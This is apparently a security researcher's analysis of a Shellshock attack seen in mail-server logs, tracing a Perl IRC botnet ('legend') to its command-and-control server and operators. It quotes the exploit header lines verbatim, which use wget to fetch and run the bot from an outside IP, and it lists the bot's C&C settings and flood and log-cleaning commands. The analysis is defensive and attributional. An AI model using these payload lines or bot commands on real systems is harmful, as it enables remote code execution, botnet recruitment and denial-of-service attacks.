This shellshock exploitation just appeared in some logs:

To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Cc:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Subject:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Script legend.txt is also here: http://pastebin.com/Z9VVwvUr 

$ host 190.94.251.41
41.251.94.190.in-addr.arpa domain name pointer 190-94-251-41.ifxnw.com.ve.

inetnum:     190.94.224/19
owner:       IFX Networks Venezuela C.A.
ownerid:     VE-EMCA-LACNIC
responsible: Juan C. Crespo R.
address:     Av El Bosque c/ Calle Santa Lucia, Torre Credicard, 416, Piso 5
address:     1050 - Caracas - DF
country:     VE

=> AS18747


Interesting bits with IRC C&C address:
my @admins=("god","ARZ","Zax");
my @hostauth=("legend.rocks");
my @channels=("#apache");
my $nick= 'OLD';
my $ircname = 'Apache';
my $realname = '$uname';
my $server='62.193.210.216';
my $port='7777';

$ host 62.193.210.216
216.210.193.62.in-addr.arpa domain name pointer vds-925735.amen-pro.com.

aut-num:        AS28677
as-name:        AMEN
descr:          AMEN Network

C&C IRC commands in 2011 version:
!legend @system
!legend @rootable
!legend @cleanlogs
!legend @socks5
!legend @nmap   
!legend @back 
!legend @sqlflood  
!legend @udp   
!legend @udp2    

C&C IRC commands added in 2012 version:
!legend @httpflood  
!legend @clean
!legend @visit 


Owner Zax is also present here: 
http://www.exposedbotnets.com/2012/08/spacelegendteaminfoirc-botnet-hosted-in.html

The malware was also available at http://legendsoftwares.com/legend.txt (hostname no longer in use)
and ellrich.com/legend.txt.

The domain legendteam.info can also be found at http://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=25534
with a newer version of the script (http://pastebin.com/ViAnsiQi).

The irc server was on space.legendteam.info, but no longer registrated. 

Users on the #vici chan:
22:05:17-!- domedan [domedan@bredband.telia.com] has joined #vici
22:05:17[Users #vici]
22:05:17[@Arz ] [ legend-2114407] [ legend-4141544] [ legend-5216791] [ legend-6564188] [ legend-902578 ]
22:05:17[@legend ] [ legend-2219609] [ legend-4205939] [ legend-5453424] [ legend-6606186] [ legend-9074556 ]
22:05:17[@Zax ] [ legend-2399867] [ legend-4269871] [ legend-5457869] [ legend-6706281] [ legend-9085946 ]
22:05:17[ domedan ] [ legend-2472740] [ legend-4411230] [ legend-5506832] [ legend-6804481] [ legend-9106466 ]
22:05:17[ legend-1053838] [ legend-2532484] [ legend-4463938] [ legend-5613237] [ legend-6939433] [ legend-9121552 ]
22:05:17[ legend-1154062] [ legend-2573772] [ legend-4490485] [ legend-5773081] [ legend-7086824] [ legend-9175657 ]
22:05:17[ legend-119405 ] [ legend-2593175] [ legend-4621717] [ legend-5792627] [ legend-7277080] [ legend-9290305 ]
22:05:17[ legend-1196016] [ legend-2738087] [ legend-4670232] [ legend-5797741] [ legend-7323799] [ legend-9362856 ]
22:05:17[ legend-1228289] [ legend-2763621] [ legend-4690292] [ legend-5811294] [ legend-7411641] [ legend-9532331 ]
22:05:17[ legend-1301620] [ legend-2854885] [ legend-4717048] [ legend-5845477] [ legend-7492307] [ legend-9541299 ]
22:05:17[ legend-1403000] [ legend-3011003] [ legend-4757422] [ legend-59046 ] [ legend-7566805] [ legend-9597850 ]
22:05:17[ legend-1500923] [ legend-3130239] [ legend-4792816] [ legend-5971684] [ legend-7590112] [ legend-9618615 ]
22:05:17[ legend-1551443] [ legend-3284672] [ legend-4810559] [ legend-5987907] [ legend-7596290] [ legend-9719818 ]
22:05:17[ legend-1640994] [ legend-3437207] [ legend-4816366] [ legend-6018961] [ legend-7603667] [ legend-972908-1472135]
22:05:17[ legend-1903723] [ legend-3481315] [ legend-4845444] [ legend-6035015] [ legend-7719432] [ legend-9838014 ]
22:05:17[ legend-1921205] [ legend-3489298] [ legend-4871822] [ legend-6261054] [ legend-7782481] [ legend-9862820 ]
22:05:17[ legend-198544 ] [ legend-3551466] [ legend-493663 ] [ legend-629499 ] [ legend-7946213]
22:05:17[ legend-2028755] [ legend-3901269] [ legend-5029084] [ legend-6337581] [ legend-8092993]
22:05:17[ legend-2041938] [ legend-4093763] [ legend-5037497] [ legend-6339421] [ legend-8603140]
22:05:17[ legend-2064633] [ legend-409732 ] [ legend-509556 ] [ legend-6377342] [ legend-8605492]
22:05:17[ legend-2088615] [ legend-4123099] [ legend-515754 ] [ legend-6394740] [ legend-8885262]
22:05:17-!- Irssi: #vici: Total of 121 nicks [3 ops, 0 halfops, 0 voices, 118 normal]
22:05:17-!- Channel #vici created Wed Jul 25 11:47:52 2012
22:05:17-!- Irssi: Join to #vici was synced in 0 secs
22:06:38[space] -!- #zax Arz H* 0 hacktech@legendteam.info [TheChozen]
22:06:38[space] -!- End of /WHO list
22:06:52[space] -!- #vici legend H 0 vici@72.21.12.168 [legend secrets!]
22:06:52[space] -!- End of /WHO list
22:07:14[space] -!- #perl Zax H* 0 Zax@legendteam.info [Zax]
22:07:14[space] -!- End of /WHO list

We can find Arz and Zax again here.

#vici seems related to vicidial, "an opensource Call center", which is a web gui for asterisk.
We can gess that similar to old pbxes, ipbxes are poorly secured and easily hacked into.

On the irc logs , we can see "god" (aka 'A'), "don" (aka 'domedan'?) and "Arz" again.